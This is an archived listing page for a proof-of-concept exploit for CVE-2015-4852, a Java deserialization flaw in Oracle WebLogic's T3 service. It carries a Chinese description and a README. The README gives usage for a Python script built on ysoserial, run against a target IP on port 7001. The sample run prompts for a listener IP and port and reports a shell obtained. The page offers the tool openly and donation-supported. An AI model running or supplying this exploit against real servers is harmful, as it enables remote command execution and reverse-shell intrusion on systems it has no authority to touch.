CVE-2015-4852 PoC — Oracle WebLogic Server WLS Security组件安全漏洞

Source

https://github.com/nex1less/CVE-2015-4852

Associated Vulnerability

Title:Oracle WebLogic Server WLS Security组件安全漏洞 (CVE-2015-4852)
Description:Oracle WebLogic Server是美国甲骨文（Oracle）公司的一款适用于云环境和传统环境的应用服务器，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。WLS Security是其中的一个安全组件。 Oracle WebLogic Server的WLS Security组件中存在安全漏洞。远程攻击者可借助发送到TCP 7001端口的T3协议流量中特制的序列化Java对象，利用该漏洞执行任意命令。

Readme

# CVE-2015-4852
前提 需要将ysoserial.jar放置于脚本目录之下（将ysoserial-0*.jar重命名为ysoserial.jar）,最好使用kali linux执行该脚本

1.使用方法：

root@kali:~# python3 CVE-2015-4852.py -h

Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001


Options:

  -h, --help            show this help message and exit
  
  -t TARGET, --target=TARGET ip port
  
  
2.例： 

root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001

请输入监听ip地址：10.6.214.1

请输入监听端口：7777

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

执行成功

获得shell

File Snapshot


 [4.0K]  /data/pocs/772a040e7043536e17f6cedda9ac525d76c1ef51
├── [2.0K]  CVE-2015-4852.py
└── [ 638]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!